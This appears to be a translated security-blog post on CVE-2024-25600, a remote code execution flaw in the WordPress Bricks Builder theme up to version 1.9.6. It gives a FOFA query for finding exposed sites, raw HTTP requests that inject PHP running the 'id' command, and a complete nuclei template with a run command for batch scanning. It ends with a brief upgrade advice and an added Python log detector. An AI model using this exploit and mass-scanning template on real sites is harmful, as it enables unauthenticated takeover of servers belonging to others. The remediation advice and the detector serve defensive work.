CVE-2024-25600

admin, February 23, 2024 09:20:30

01

Vulnerability name

WordPress Bricks Builder RCE vulnerability

02

Affected versions

Bricks Builder <= 1.9.6

03

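Vulnerability description

Bricks Builder is a development theme for WordPress that provides an intuitive drag-and-drop interface for designing and building WordPress sites. WordPress installations running the Bricks Builder theme at version <= 1.9.6 are affected by a remote code execution vulnerability.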

04

FOFA search query
body="/wp-content/themes/bricks/"

05

Reproduction

Step 1: obtain the site's nonce value

GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: send the following request to the test target to execute the id command

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

The vulnerability is reproduced successfully.

06

Batch scanning script

The nuclei PoC file is as follows:

id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution - Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  metadata:
    publicwww-query: "/wp-content/themes/bricks/"
    verified: true
    max-request: 2
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950

Run the PoC

nuclei.exe -l data/CVE-2024-25600.txt -t mypoc/cve/CVE-2024-25600.yaml

07

Remediation

Upgrade to the latest version.
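
A detection sketch for the request shape shown in the reproduction section, added here as an example and not part of the original post or of Bricks: it flags logged POST requests to the bricks/v1/render_element route whose JSON body carries a non-empty queryEditor value. The function names, verdict labels and sample requests are constructed for illustration, and it assumes request bodies are available in the log source (for example from a WAF or reverse proxy).

```python
import json
from urllib.parse import unquote

ROUTE = "bricks/v1/render_element"  # REST route used in the request above

def find_query_editor(node):
    """Return the first non-empty 'queryEditor' string anywhere in the JSON tree."""
    if isinstance(node, dict):
        code = node.get("queryEditor")
        if isinstance(code, str) and code.strip():
            return code
        children = list(node.values())
    elif isinstance(node, list):
        children = node
    else:
        return None
    for child in children:
        found = find_query_editor(child)
        if found:
            return found
    return None

def classify(method, url, body):
    """Verdict for one logged request: 'ignore', 'route-hit' or 'alert'."""
    if method.upper() != "POST" or ROUTE not in unquote(url).lower():
        return "ignore"
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return "route-hit"  # body missing or not JSON: log the hit for review
    return "alert" if find_query_editor(doc) else "route-hit"

# Constructed sample requests (method, URL, body); the code value is a placeholder.
SAMPLES = [
    ("GET", "/", ""),
    ("POST", "/wp-json/bricks/v1/render_element",
     '{"postId":"1","nonce":"0000000000","element":{"name":"container",'
     '"settings":{"hasLoop":"true","query":{"useQueryEditor":true,'
     '"queryEditor":"<php code>","objectType":"post"}}}}'),
    ("POST", "/wp-json/bricks/v1/render_element",
     '{"postId":"1","nonce":"0000000000","element":{"name":"heading","settings":{}}}'),
    ("POST", "/wp-json/bricks/v1/render_element", "not json"),
]

def scan(samples):
    """Classify each (method, url, body) tuple and return the verdicts in order."""
    return [classify(m, u, b) for m, u, b in samples]

if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(verdict, sample[0], sample[1])
```

An "alert" verdict on a request from an unauthenticated client is worth correlating with the site's installed Bricks version, since versions <= 1.9.6 are the affected range.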

Originally published on the WeChat official account AI与网安: CVE-2024-25600
